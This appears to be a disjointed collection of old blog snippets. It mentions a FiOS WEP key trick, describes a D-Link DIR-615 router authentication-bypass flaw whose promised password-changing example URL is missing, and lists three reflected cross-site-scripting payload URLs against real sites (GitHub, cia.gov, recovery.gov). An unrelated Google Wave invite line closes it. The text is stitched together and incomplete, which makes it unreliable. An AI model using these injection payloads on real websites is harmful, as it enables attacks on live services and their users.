Started cleaning out some old code and found this. It was a quick little trick to decrypt (some) FiOS WEP keys, not sure if it still works.
D-Link’s DIR-615 Wireless N Router (http://www.dlink.com/products/?pid=565) contains a flaw that allows attackers to access administrative functions without authorization. By simply requesting a certain URL, this vulnerability can be used to perform numerous attacks including changing the admin password, disabling wireless security, and changing DNS settings.
The hole is confirmed in firmware version 3.10NA.
Example (changes admin password to ‘pwdpwd’):
Change password on 192.168.0.1
http://github.com/search?q=python&type=Everything&repo='"><script>alert(/pwned/)</script>
https://www.cia.gov/search?q="%20style%3d"position:absolute;top:-100px;left:-100px;width:10000px;height:10000px;z-index:999;"%20onmouseover%3d"alert(/pwn3d/)
http://www.recovery.gov/_layouts/1033/Recovery500.aspx?errorurl=<script>alert('and pwned again')</script>&error=<script>alert('pwned')</script>
More Google Wave invites, who wants em?
